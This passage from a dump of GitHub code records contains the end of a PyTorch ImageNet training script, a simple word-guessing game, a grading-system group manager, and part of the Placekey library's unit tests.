np.prod(input_size)\n self.linear = nn.Linear(input_size, 1000)\n\n # Sec 5.1 in \"Accurate, Large Minibatch SGD: Training ImageNet in 1 Hour\":\n # \"The 1000-way fully-connected layer is initialized by\n # drawing weights from a zero-mean Gaussian with standard deviation of 0.01.\"\n nn.init.normal_(self.linear.weight, std=0.01)\n nn.init.constant_(self.linear.bias, 0.0)\n\n def forward(self, x):\n x = self.backbone(x)\n x = self.maxpool(x[\"res5\"])\n x = self.neck(x)\n x = self.linear(x.view(x.size(0), -1))\n return x\n\n\ndef set_resnet_ws_basic_cfg(arch, args, cfg):\n add_wsl_config(cfg)\n cfg.defrost()\n if arch == \"resnet101_ws\" or arch == \"resnet101_nas\":\n cfg.MODEL.BACKBONE.NAME = \"build_resnet_ws_backbone\"\n cfg.MODEL.RESNETS.DEPTH = 101\n cfg.MODEL.ROI_BOX_HEAD.DAN_DIM = [2048, 4096]\n elif arch == \"resnet50_ws\" or arch == \"resnet50_nas\":\n cfg.MODEL.BACKBONE.NAME = \"build_resnet_ws_backbone\"\n cfg.MODEL.ROI_BOX_HEAD.DAN_DIM = [2048, 4096]\n cfg.MODEL.RESNETS.DEPTH = 50\n elif arch == \"resnet18_ws\" or arch == \"resnet18_nas\":\n cfg.MODEL.BACKBONE.NAME = \"build_resnet_ws_backbone\"\n cfg.MODEL.RESNETS.DEPTH = 18\n cfg.MODEL.ROI_BOX_HEAD.DAN_DIM = [4096, 4096]\n cfg.MODEL.RESNETS.RES2_OUT_CHANNELS = 64\n cfg.MODEL.ROI_BOX_HEAD.NAME = \"DiscriminativeAdaptionNeck\"\n cfg.MODEL.ROI_BOX_HEAD.NUM_FC = 2\n cfg.MODEL.RESNETS.NORM = \"BN\"\n cfg.MODEL.RESNETS.OUT_FEATURES = [\"res5\"]\n cfg.MODEL.BACKBONE.FREEZE_AT = 0\n cfg.OUTPUT_DIR = args.output_dir\n cfg.freeze()\n return cfg\n\n\ndef get_resnet_ws(arch, args):\n cfg = get_cfg()\n cfg = set_resnet_ws_basic_cfg(arch, args, cfg)\n cfg.defrost()\n cfg.MODEL.ROI_BOX_HEAD.NAME = \"DiscriminativeAdaptionNeck\"\n cfg.MODEL.ROI_BOX_HEAD.NUM_FC = 2\n cfg.freeze()\n\n model = ResNet_WS(cfg)\n print(model)\n return model\n\n\ndef get_resnet_nas(arch, args):\n cfg = get_cfg()\n cfg = set_resnet_ws_basic_cfg(arch, args, cfg)\n cfg.defrost()\n cfg.MODEL.ROI_BOX_HEAD.NAME = \"NASNeck\"\n cfg.freeze()\n\n model = ResNet_WS(cfg)\n print(model)\n return model\n\n\ndef to_tensor(pic):\n \"\"\"Convert a ``PIL Image`` or ``numpy.ndarray`` to tensor.\n\n See ``ToTensor`` for more details.\n\n Args:\n pic (PIL Image or numpy.ndarray): Image to be converted to tensor.\n\n Returns:\n Tensor: Converted image.\n \"\"\"\n img = torch.ByteTensor(torch.ByteStorage.from_buffer(pic.tobytes()))\n nchannel = len(pic.mode)\n img = img.view(pic.size[1], pic.size[0], nchannel)\n # RGB to BGR\n img = img[:, :, [2, 1, 0]]\n # put it from HWC to CHW format\n # yikes, this transpose takes 80% of the loading time/CPU\n img = img.transpose(0, 1).transpose(0, 2).contiguous()\n return img.float()\n\n\nclass ToTensor(object):\n \"\"\"Convert a ``PIL Image`` or ``numpy.ndarray`` to tensor.\n\n Converts a PIL Image or numpy.ndarray (H x W x C) in the range [0, 255] of RGB forma to a torch.FloatTensor of shape (C x H x W) in the range [0.0, 255.0] of BGR format.\n \"\"\"\n\n def __call__(self, pic):\n \"\"\"\n Args:\n pic (PIL Image or numpy.ndarray): Image to be converted to tensor.\n\n Returns:\n Tensor: Converted image.\n \"\"\"\n return to_tensor(pic)\n\n def __repr__(self):\n return self.__class__.__name__ + \"()\"\n\n\nmodel_names = sorted(\n name\n for name in models.__dict__\n if name.islower() and not name.startswith(\"__\") and callable(models.__dict__[name])\n) + [\"resnet101_ws\", \"resnet50_ws\", \"resnet18_ws\", \"resnet101_nas\", \"resnet50_nas\", \"resnet18_nas\"]\n\nparser = argparse.ArgumentParser(description=\"PyTorch ImageNet Training\")\nparser.add_argument(\"data\", metavar=\"DIR\", help=\"path to dataset\")\nparser.add_argument(\n \"-a\",\n \"--arch\",\n metavar=\"ARCH\",\n default=\"resnet18\",\n choices=model_names,\n help=\"model architecture: \" + \" | \".join(model_names) + \" (default: resnet18)\",\n)\nparser.add_argument(\n \"-j\",\n \"--workers\",\n default=4,\n type=int,\n metavar=\"N\",\n help=\"number of data loading workers (default: 4)\",\n)\nparser.add_argument(\n \"--epochs\", default=90, type=int, metavar=\"N\", help=\"number of total epochs to run\"\n)\nparser.add_argument(\n \"--start-epoch\",\n default=0,\n type=int,\n metavar=\"N\",\n help=\"manual epoch number (useful on restarts)\",\n)\nparser.add_argument(\n \"-b\",\n \"--batch-size\",\n default=256,\n type=int,\n metavar=\"N\",\n help=\"mini-batch size (default: 256), this is the total \"\n \"batch size of all GPUs on the current node when \"\n \"using Data Parallel or Distributed Data Parallel\",\n)\nparser.add_argument(\n \"--lr\",\n \"--learning-rate\",\n default=0.1,\n type=float,\n metavar=\"LR\",\n help=\"initial learning rate\",\n dest=\"lr\",\n)\nparser.add_argument(\"--momentum\", default=0.9, type=float, metavar=\"M\", help=\"momentum\")\nparser.add_argument(\n \"--wd\",\n \"--weight-decay\",\n default=1e-4,\n type=float,\n metavar=\"W\",\n help=\"weight decay (default: 1e-4)\",\n dest=\"weight_decay\",\n)\nparser.add_argument(\n \"-p\", \"--print-freq\", default=10, type=int, metavar=\"N\", help=\"print frequency (default: 10)\"\n)\nparser.add_argument(\n \"--resume\",\n default=\"\",\n type=str,\n metavar=\"PATH\",\n help=\"path to latest checkpoint (default: none)\",\n)\nparser.add_argument(\n \"-e\",\n \"--evaluate\",\n dest=\"evaluate\",\n action=\"store_true\",\n help=\"evaluate model on validation set\",\n)\nparser.add_argument(\n \"--pretrained\", dest=\"pretrained\", action=\"store_true\", help=\"use pre-trained model\"\n)\nparser.add_argument(\n \"--world-size\", default=-1, type=int, help=\"number of nodes for distributed training\"\n)\nparser.add_argument(\"--rank\", default=-1, type=int, help=\"node rank for distributed training\")\nparser.add_argument(\n \"--dist-url\",\n default=\"tcp://224.66.41.62:23456\",\n type=str,\n help=\"url used to set up distributed training\",\n)\nparser.add_argument(\"--dist-backend\", default=\"nccl\", type=str, help=\"distributed backend\")\nparser.add_argument(\"--seed\", default=None, type=int, help=\"seed for initializing training. \")\nparser.add_argument(\"--gpu\", default=None, type=int, help=\"GPU id to use.\")\nparser.add_argument(\n \"--multiprocessing-distributed\",\n action=\"store_true\",\n help=\"Use multi-processing distributed training to launch \"\n \"N processes per node, which has N GPUs. This is the \"\n \"fastest way to use PyTorch for either single node or \"\n \"multi node data parallel training\",\n)\nparser.add_argument(\n \"--output_dir\",\n default=\"\",\n type=str,\n metavar=\"PATH\",\n help=\"path to save checkpoint (default: none)\",\n)\nparser.add_argument(\n \"--weights\", default=\"\", type=str, metavar=\"PATH\", help=\"path to load c1 pkl (default: none)\"\n)\n\nbest_acc1 = 0\n\n\ndef main():\n args = parser.parse_args()\n\n if args.seed is not None:\n random.seed(args.seed)\n torch.manual_seed(args.seed)\n cudnn.deterministic = True\n warnings.warn(\n \"You have chosen to seed training. \"\n \"This will turn on the CUDNN deterministic setting, \"\n \"which can slow down your training considerably! \"\n \"You may see unexpected behavior when restarting \"\n \"from checkpoints.\"\n )\n\n if args.gpu is not None:\n warnings.warn(\n \"You have chosen a specific GPU. This will completely \" \"disable data parallelism.\"\n )\n\n if args.dist_url == \"env://\" and args.world_size == -1:\n args.world_size = int(os.environ[\"WORLD_SIZE\"])\n\n args.distributed = args.world_size > 1 or args.multiprocessing_distributed\n\n ngpus_per_node = torch.cuda.device_count()\n if args.multiprocessing_distributed:\n # Since we have ngpus_per_node processes per node, the total world_size\n # needs to be adjusted accordingly\n args.world_size = ngpus_per_node * args.world_size\n # Use torch.multiprocessing.spawn to launch distributed processes: the\n # main_worker process function\n mp.spawn(main_worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args))\n else:\n # Simply call main_worker function\n main_worker(args.gpu, ngpus_per_node, args)\n\n\ndef main_worker(gpu, ngpus_per_node, args):\n global best_acc1\n args.gpu = gpu\n\n if args.gpu is not None:\n print(\"Use GPU: {} for training\".format(args.gpu))\n\n if args.distributed:\n if args.dist_url == \"env://\" and args.rank == -1:\n args.rank = int(os.environ[\"RANK\"])\n if args.multiprocessing_distributed:\n # For multiprocessing distributed training, rank needs to be the\n # global rank among all the processes\n args.rank = args.rank * ngpus_per_node + gpu\n dist.init_process_group(\n backend=args.dist_backend,\n init_method=args.dist_url,\n world_size=args.world_size,\n rank=args.rank,\n )\n # create model\n if args.pretrained:\n print(\"=> using pre-trained model '{}'\".format(args.arch))\n model = models.__dict__[args.arch](pretrained=True)\n else:\n print(\"=> creating model '{}'\".format(args.arch))\n if \"_ws\" in args.arch:\n model = get_resnet_ws(args.arch, args)\n elif \"_nas\" in args.arch:\n model = get_resnet_nas(args.arch, args)\n else:\n model = models.__dict__[args.arch]()\n\n if args.weights:\n print(\"=> loading weights '{}'\".format(args.weights))\n DetectionCheckpointer(model, save_dir=args.output_dir).resume_or_load(\n args.weights, resume=True\n )\n\n if args.distributed:\n # For multiprocessing distributed, DistributedDataParallel constructor\n # should always set the single device scope, otherwise,\n # DistributedDataParallel will use all available devices.\n if args.gpu is not None:\n torch.cuda.set_device(args.gpu)\n model.cuda(args.gpu)\n # When using a single GPU per process and per\n # DistributedDataParallel, we need to divide the batch size\n # ourselves based on the total number of GPUs we have\n args.batch_size = int(args.batch_size / ngpus_per_node)\n args.workers = int((args.workers + ngpus_per_node - 1) / ngpus_per_node)\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])\n else:\n model.cuda()\n # DistributedDataParallel will divide and allocate batch_size to all\n # available GPUs if device_ids are not set\n model = torch.nn.parallel.DistributedDataParallel(model)\n elif args.gpu is not None:\n torch.cuda.set_device(args.gpu)\n model = model.cuda(args.gpu)\n else:\n # DataParallel will divide and allocate batch_size to all available GPUs\n if args.arch.startswith(\"alexnet\") or args.arch.startswith(\"vgg\"):\n model.features = torch.nn.DataParallel(model.features)\n model.cuda()\n else:\n model = torch.nn.DataParallel(model).cuda()\n\n # define loss function (criterion) and optimizer\n criterion = nn.CrossEntropyLoss().cuda(args.gpu)\n\n optimizer = torch.optim.SGD(\n model.parameters(), args.lr, momentum=args.momentum, weight_decay=args.weight_decay\n )\n\n # optionally resume from a checkpoint\n if args.resume:\n if os.path.isfile(args.resume):\n print(\"=> loading checkpoint '{}'\".format(args.resume))\n if args.gpu is None:\n checkpoint = torch.load(args.resume)\n else:\n # Map model to be loaded to specified single gpu.\n loc = \"cuda:{}\".format(args.gpu)\n checkpoint = torch.load(args.resume, map_location=loc)\n args.start_epoch = checkpoint[\"epoch\"]\n best_acc1 = checkpoint[\"best_acc1\"]\n if args.gpu is not None:\n # best_acc1 may be from a checkpoint from a different GPU\n best_acc1 = best_acc1.to(args.gpu)\n model.load_state_dict(checkpoint[\"state_dict\"])\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\n print(\"=> loaded checkpoint '{}' (epoch {})\".format(args.resume, checkpoint[\"epoch\"]))\n else:\n print(\"=> no checkpoint found at '{}'\".format(args.resume))\n\n cudnn.benchmark = True\n\n # Data loading code\n traindir = os.path.join(args.data, \"train\")\n valdir = os.path.join(args.data, \"val\")\n # normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n normalize = transforms.Normalize(mean=[102.9801, 115.9465, 122.7717], std=[1.0, 1.0, 1.0])\n\n train_dataset = datasets.ImageFolder(\n traindir,\n transforms.Compose(\n [\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n ToTensor(),\n normalize,\n ]\n ),\n )\n\n if args.distributed:\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)\n else:\n train_sampler = None\n\n train_loader = torch.utils.data.DataLoader(\n train_dataset,\n batch_size=args.batch_size,\n shuffle=(train_sampler is None),\n num_workers=args.workers,\n pin_memory=True,\n sampler=train_sampler,\n )\n\n val_loader = torch.utils.data.DataLoader(\n datasets.ImageFolder(\n valdir,\n transforms.Compose(\n [transforms.Resize(256), transforms.CenterCrop(224), ToTensor(), normalize]\n ),\n ),\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.workers,\n pin_memory=True,\n )\n\n if args.evaluate:\n validate(val_loader, model, criterion, args)\n return\n\n for epoch in range(args.start_epoch, args.epochs):\n if args.distributed:\n train_sampler.set_epoch(epoch)\n adjust_learning_rate(optimizer, epoch, args)\n\n # train for one epoch\n train(train_loader, model, criterion, optimizer, epoch, args)\n\n # evaluate on validation set\n acc1 = validate(val_loader, model, criterion, args)\n\n # remember best acc@1 and save checkpoint\n is_best = acc1 > best_acc1\n best_acc1 = max(acc1, best_acc1)\n\n if not args.multiprocessing_distributed or (\n args.multiprocessing_distributed and args.rank % ngpus_per_node == 0\n ):\n\n filename = os.path.join(args.output_dir, str(epoch) + \"_iter.pth.tar\")\n save_checkpoint(\n {\n \"epoch\": epoch + 1,\n \"arch\": args.arch,\n \"state_dict\": model.state_dict(),\n \"best_acc1\": best_acc1,\n \"optimizer\": optimizer.state_dict(),\n },\n is_best,\n filename=filename,\n )\n\n\ndef train(train_loader, model, criterion, optimizer, epoch, args):\n batch_time = AverageMeter(\"Time\", \":6.3f\")\n data_time = AverageMeter(\"Data\", \":6.3f\")\n losses = AverageMeter(\"Loss\", \":.4e\")\n top1 = AverageMeter(\"Acc@1\", \":6.2f\")\n top5 = AverageMeter(\"Acc@5\", \":6.2f\")\n lr = AverageMeter(\"lr\", \":1.7f\")\n progress = ProgressMeter(\n len(train_loader),\n [batch_time, data_time, losses, top1, top5, lr],\n prefix=\"Epoch: [{}]\".format(epoch),\n )\n\n # switch to train mode\n model.train()\n\n end = time.time()\n for i, (images, target) in enumerate(train_loader):\n # measure data loading time\n data_time.update(time.time() - end)\n\n if args.gpu is not None:\n images = images.cuda(args.gpu, non_blocking=True)\n target = target.cuda(args.gpu, non_blocking=True)\n\n # compute output\n output = model(images)\n loss = criterion(output, target)\n\n # measure accuracy and record loss\n acc1, acc5 = accuracy(output, target, topk=(1, 5))\n losses.update(loss.item(), images.size(0))\n top1.update(acc1[0], images.size(0))\n top5.update(acc5[0], images.size(0))\n lr.update(optimizer.param_groups[0][\"lr\"], 1)\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n progress.display(i)\n\n\ndef validate(val_loader, model, criterion, args):\n batch_time = AverageMeter(\"Time\", \":6.3f\")\n losses = AverageMeter(\"Loss\", \":.4e\")\n top1 = AverageMeter(\"Acc@1\", \":6.2f\")\n top5 = AverageMeter(\"Acc@5\", \":6.2f\")\n progress = ProgressMeter(len(val_loader), [batch_time, losses, top1, top5], prefix=\"Test: \")\n\n # switch to evaluate mode\n model.eval()\n\n with torch.no_grad():\n end = time.time()\n for i, (images, target) in enumerate(val_loader):\n if args.gpu is not None:\n images = images.cuda(args.gpu, non_blocking=True)\n target = target.cuda(args.gpu, non_blocking=True)\n\n # compute output\n output = model(images)\n loss = criterion(output, target)\n\n # measure accuracy and record loss\n acc1, acc5 = accuracy(output, target, topk=(1, 5))\n losses.update(loss.item(), images.size(0))\n top1.update(acc1[0], images.size(0))\n top5.update(acc5[0], images.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n progress.display(i)\n\n # TODO: this should also be done with the ProgressMeter\n print(\" * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}\".format(top1=top1, top5=top5))\n\n return top1.avg\n\n\ndef save_checkpoint(state, is_best, filename=\"checkpoint.pth.tar\"):\n torch.save(state, filename)\n if is_best:\n shutil.copyfile(filename, os.path.join(os.path.dirname(filename), \"model_best.pth.tar\"))\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self, name, fmt=\":f\"):\n self.name = name\n self.fmt = fmt\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n def __str__(self):\n fmtstr = \"{name} {val\" + self.fmt + \"} ({avg\" + self.fmt + \"})\"\n return fmtstr.format(**self.__dict__)\n\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def display(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n print(\"\\t\".join(entries))\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = \"{:\" + str(num_digits) + \"d}\"\n return \"[\" + fmt + \"/\" + fmt.format(num_batches) + \"]\"\n\n\ndef adjust_learning_rate(optimizer, epoch, args):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n lr = args.lr * (0.1 ** (epoch // 30))\n for param_group in optimizer.param_groups:\n param_group[\"lr\"] = lr\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the accuracy over the k top predictions for the specified values of k\"\"\"\n with torch.no_grad():\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"shenyunhang/DRN-WSOD-pytorch","sub_path":"projects/WSL/tools/imagenet.py","file_name":"imagenet.py","file_ext":"py","file_size_in_byte":21405,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"56"} +{"seq_id":"27877356360","text":"import random\r\n\r\ndef save_words(words):\r\n with open(\"words.txt\", \"w\") as file:\r\n for word in words:\r\n file.write(word + \"\\n\")\r\n\r\ndef choose_random_word():\r\n with open(\"words.txt\", \"r\") as file:\r\n words = file.readlines()\r\n random_word = random.choice(words).strip()\r\n return random_word\r\n\r\n\r\ninput_words = input(\"word_list: \")\r\nwords_list = input_words.split(\",\")\r\n\r\n\r\nsave_words(words_list)\r\n\r\n\r\nrandom_word = choose_random_word()\r\nprint(\"random_word: \" + random_word)\r\n\r\n\r\n\r\ncorrect_guesses = []\r\nwrong_guesses = []\r\nchances = 5\r\n\r\nwhile chances > 0:\r\n letter = input(\"input your word: \")\r\n \r\n if letter in random_word:\r\n correct_guesses.append(letter)\r\n print(\"Words guesses correctly: \" + \", \".join(correct_guesses))\r\n else:\r\n wrong_guesses.append(letter)\r\n chances -= 1\r\n print(\"Wrong words guessed: \" + \", \".join(wrong_guesses))\r\n print(\"Number of chances left: \" + str(chances))\r\n \r\n if set(correct_guesses) == set(random_word):\r\n print(\"Congratulations, you got it right.\")\r\n print(\"The right word: \" + random_word)\r\n break\r\n\r\nif chances == 0:\r\n print(\"sorry, you are out of luck. the right word: \" + random_word)\r\n","repo_name":"rezaa79/Word-guessing-game","sub_path":"guess word.py","file_name":"guess word.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"8342745864","text":"from typing import Iterable, List\r\n\r\nfrom api.models.api_group import ApiGroup, ApiGroupStudents, ApiGroupStats, ApiNewGroup\r\nfrom api.models.managers.student_manager import StudentManager\r\nfrom db.controllers.group_controller import GroupController\r\nfrom db.models.groups import Group\r\n\r\n\r\nclass GroupManager:\r\n @staticmethod\r\n def get_api_group_from_group(group: Group) -> ApiGroup:\r\n return ApiGroup(id=group.group_id, name=group.name, students_count=len(group.students))\r\n\r\n @staticmethod\r\n def get_api_group_student_from_group(group: Group) -> ApiGroupStudents:\r\n api_group = ApiGroupStudents(\r\n **GroupManager.get_api_group_from_group(group).dict(),\r\n students=StudentManager.get_api_students_from_students(group.students.values())\r\n )\r\n return api_group\r\n\r\n @staticmethod\r\n def get_api_groups_students_from_groups(groups: Iterable[Group]) -> List[ApiGroup]:\r\n return [GroupManager.get_api_group_student_from_group(g) for g in groups]\r\n\r\n @staticmethod\r\n def get_api_group_stats_from_group(group: Group) -> ApiGroupStats:\r\n group_controller = GroupController(group)\r\n api_group_stats = ApiGroupStats(\r\n **GroupManager.get_api_group_from_group(group).dict(),\r\n grades_stats=group_controller.stats_by_subject,\r\n top_three_students=[\r\n StudentManager.get_api_student_avg_grade_from_student(student)\r\n for student in group_controller.top_three_students\r\n ]\r\n )\r\n return api_group_stats\r\n\r\n @staticmethod\r\n def get_group_from_group_new_api(group_new_api: ApiNewGroup) -> Group:\r\n return Group(name=group_new_api.name)\r\n","repo_name":"jafaul/grading_system","sub_path":"api/models/managers/group_manager.py","file_name":"group_manager.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31029231976","text":"\"\"\"\nPlacekey tests. These can be ran by calling `python3 -m unittest placekey.tests.test_placekey`\nin the parent directory of this repository.\n\n\"\"\"\n\nimport unittest\nimport h3.api.basic_int as h3_int\nfrom shapely.wkt import loads as wkt_loads\nfrom shapely.geometry import shape\nfrom shapely.ops import transform\nimport placekey.placekey as pk\n\n\nclass TestPlacekey(unittest.TestCase):\n \"\"\"\n Tests for placekey.py\n \"\"\"\n\n def setUp(self):\n def parse(line):\n tokens = line.split(',')\n return {\n \"lat\": float(tokens[0]),\n \"long\": float(tokens[1]),\n \"h3_r10\": tokens[2],\n \"h3_int_r10\": int(tokens[3]),\n \"placekey\": tokens[4],\n 'h3_lat': float(tokens[5]),\n 'h3_long': float(tokens[6]),\n 'info': tokens[7]\n }\n\n with open('placekey/tests/example_geos.csv', 'r') as f:\n next(f) # skip header\n self.sample = [parse(l.strip()) for l in f.readlines()]\n\n def parse_distances(line):\n tokens = line.split('\\t')\n return {\n 'placekey_1': tokens[0],\n 'geo_1': [float(x) for x in tokens[1][1:-1].split(',')],\n 'placekey_2': tokens[2],\n 'geo_2': [float(x) for x in tokens[3][1:-1].split(',')],\n 'distance': float(tokens[4]),\n }\n\n with open('placekey/tests/example_distances.tsv') as f:\n next(f) # skip header\n self.distance_samples = [parse_distances(l.strip())\n for l in f.readlines()]\n\n def test_geo_to_placekey(self):\n \"\"\"\n Test geo to Placekey conversion\n \"\"\"\n for row in self.sample:\n self.assertEqual(\n pk.geo_to_placekey(row['lat'], row['long']), row['placekey'],\n \"converted geo ({}, {}) did not match placekey ({})\".format(\n row['lat'], row['long'], row['placekey']))\n\n def test_placekey_to_geo(self):\n \"\"\"\n Test Placekey to geo conversion\n \"\"\"\n matching_places = 3\n for row in self.sample:\n lat, long = pk.placekey_to_geo(row['placekey'])\n self.assertAlmostEqual(\n lat, row['h3_lat'], matching_places,\n \"placekey's latitude ({}) too far from associated geo's latitude ({})\".format(\n lat, row['h3_lat']))\n self.assertAlmostEqual(\n long, row['h3_long'], matching_places,\n \"placekey's longitude ({}) too far from associated geo's longitude ({})\".format(\n long, row['h3_long']))\n\n def test_placekey_to_h3(self):\n \"\"\"\n Test Placekey to H3 conversion\n \"\"\"\n for row in self.sample:\n self.assertEqual(\n pk.placekey_to_h3(row['placekey']), row['h3_r10'],\n \"converted placekey ({}) did not match H3 at resolution 10 ({})\".format(\n pk.placekey_to_h3(row['placekey']), row['h3_r10']))\n\n def test_h3_to_placekey(self):\n \"\"\"\n Test H3 to Placekey conversion\n \"\"\"\n for row in self.sample:\n self.assertEqual(\n pk.h3_to_placekey(row['h3_r10']), row['placekey'],\n \"converted h3 ({}) did not match placekey ({})\".format(\n pk.h3_to_placekey(row['h3_r10']), row['placekey']))\n\n def test_string_cleaning(self):\n \"\"\"\n Test removal and reinsertion of bad words in strings\n \"\"\"\n for bw, replacement in pk.REPLACEMENT_MAP:\n self.assertEqual(\n pk._dirty_string(pk._clean_string(bw)), bw,\n \"dirty(clean()) not an identity mapping for {}\".format(bw))\n self.assertEqual(\n pk._clean_string(pk._dirty_string(replacement)), replacement,\n \"clean(dirty()) not an identity mapping for {}\".format(replacement))\n\n self.assertEqual(pk._clean_string('vjngr'), \"vjugu\",\n \"clean overlapping bad words out of sequence order\")\n self.assertEqual(pk._dirty_string('vjugu'), 'vjngr',\n \"dirty overlapping bad words out of sequence order\")\n\n self.assertEqual(pk._clean_string('prngr'), \"pregr\",\n \"clean overlapping bad words in sequence order\")\n self.assertEqual(pk._dirty_string('pregr'), 'prngr',\n \"dirty overlapping bad words in sequence order\")\n\n def test_get_neighboring_placekeys(self):\n \"\"\"\n Test generation of neighboring placekeys\n \"\"\"\n key = '@5vg-7gq-tvz'\n neighbors_dist1 = {\n '@5vg-7gq-7nq',\n '@5vg-7gq-7t9',\n '@5vg-7gq-gx5',\n '@5vg-7gq-tjv',\n '@5vg-7gq-tvz',\n '@5vg-7gq-ty9',\n '@5vg-7gq-v2k'}\n\n self.assertSetEqual(pk.get_neighboring_placekeys(key, 0), {key},\n \"placekey is its only neighbor of distance 0\")\n self.assertSetEqual(pk.get_neighboring_placekeys(key, 1), neighbors_dist1,\n \"placekey neighbors of distance 1 correct\")\n\n def test_placekey_to_hex_boundary(self):\n \"\"\"\n Test placekey to geo boundary conversion\n \"\"\"\n key = '@5vg-7gq-tvz'\n h3_integer = pk.placekey_to_h3_int(key)\n self.assertTupleEqual(\n pk.placekey_to_hex_boundary(key, geo_json=True),\n h3_int.h3_to_geo_boundary(h3_integer, geo_json=True),\n \"placekey boundary equal to H3 boundary (geo_json=True)\")\n self.assertTupleEqual(\n pk.placekey_to_hex_boundary(key, geo_json=False),\n h3_int.h3_to_geo_boundary(h3_integer, geo_json=False),\n \"placekey boundary equal to H3 boundary (geo_json=False)\")\n\n def test_placekey_to_wkt(self):\n \"\"\"\n Test Placekey to WKT conversion\n \"\"\"\n key = '@5vg-7gq-tvz'\n wkt = (\n 'POLYGON ((37.77804284141394 -122.4188730164743, '\n '37.77820687262237 -122.4197189541481, '\n '37.77887710717697 -122.4199258090291, '\n '37.77938331431949 -122.4192867193292, '\n '37.77921928451977 -122.4184407703954, '\n '37.77854904616886 -122.4182339224218, '\n '37.77804284141394 -122.4188730164743))'\n )\n pk_wkt = pk.placekey_to_wkt(key, geo_json=False)\n try:\n self.assertEqual(pk_wkt, wkt, 'correct WKT conversion')\n except AssertionError:\n # Depending on the system there may be small variations in the least\n # significant digits of the polygon vertices. This check verifies\n # that the resulting polygons\n pk_poly = wkt_loads(pk_wkt)\n wkt_poly = wkt_loads(wkt)\n self.assertTrue(pk_poly.almost_equals(wkt_poly, decimal=12))\n\n def test_placekey_to_geojson(self):\n \"\"\"\n Test Placekey to GeoJSON conversion\n \"\"\"\n key = '@5vg-7gq-tvz' # centroid: (lat=37.77871308025089, long=-122.41907986670626)\n\n # Recall that GeoJSON specifies coordinates as (long, lat)\n geo_json = {\n 'type': 'Polygon',\n 'coordinates': ((\n (-122.41887301647432, 37.77804284141394),\n (-122.41823392242185, 37.77854904616886),\n (-122.41844077039543, 37.77921928451977),\n (-122.41928671932915, 37.77938331431949),\n (-122.41992580902914, 37.77887710717697),\n (-122.41971895414808, 37.77820687262237),\n (-122.41887301647432, 37.77804284141394)),)\n }\n pk_geojson = pk.placekey_to_geojson(key)\n try:\n self.assertEqual(pk_geojson, geo_json, 'correct GeoJSON conversion')\n except AssertionError:\n # Depending on the system there may be small variations in the least\n # significant digits of the polygon vertices. This check verifies\n # that the resulting polygons\n pk_poly = shape(pk_geojson)\n geojson_poly = shape(geo_json)\n self.assertTrue(pk_poly.almost_equals(geojson_poly, decimal=12))\n\n def test_placekey_format_is_valid(self):\n \"\"\"\n Test format validation for Placekeys\n \"\"\"\n self.assertTrue(pk.placekey_format_is_valid('5vg-7gq-tvz'),\n 'where with no @')\n self.assertTrue(pk.placekey_format_is_valid('@5vg-7gq-tvz'),\n 'where with @')\n self.assertTrue(pk.placekey_format_is_valid('zzz@5vg-7gq-tvz'),\n 'single tuple what with where')\n self.assertTrue(pk.placekey_format_is_valid('222-zzz@5vg-7gq-tvz'),\n 'double tuple what with where')\n self.assertTrue(pk.placekey_format_is_valid('2222-zzz@5vg-7gq-tvz'),\n 'long address encoding with where')\n self.assertTrue(pk.placekey_format_is_valid('222-zzzz@5vg-7gq-tvz'),\n 'long poi encoding with where')\n self.assertTrue(pk.placekey_format_is_valid('22222222-zzzzzzzzz@5vg-7gq-tvz'),\n 'long address and poi encoding with where')\n\n self.assertFalse(pk.placekey_format_is_valid('@abc'), 'short where part')\n self.assertFalse(pk.placekey_format_is_valid('abc-xyz'), 'short where part')\n self.assertFalse(pk.placekey_format_is_valid('abcxyz234'), 'no dashes')\n self.assertFalse(pk.placekey_format_is_valid('abc-345@abc-234-xyz'),\n 'padding character in what')\n self.assertFalse(pk.placekey_format_is_valid('ebc-345@abc-234-xyz'),\n 'replacement character in what')\n self.assertFalse(pk.placekey_format_is_valid('bcd-345@'),\n 'missing what part')\n self.assertFalse(pk.placekey_format_is_valid('22-zzz@abc-234-xyz'),\n 'short address encoding')\n self.assertFalse(pk.placekey_format_is_valid('222-zz@abc-234-xyz'),\n 'short poi encoding')\n\n self.assertFalse(pk.placekey_format_is_valid('@abc-234-xyz'), 'invalid where 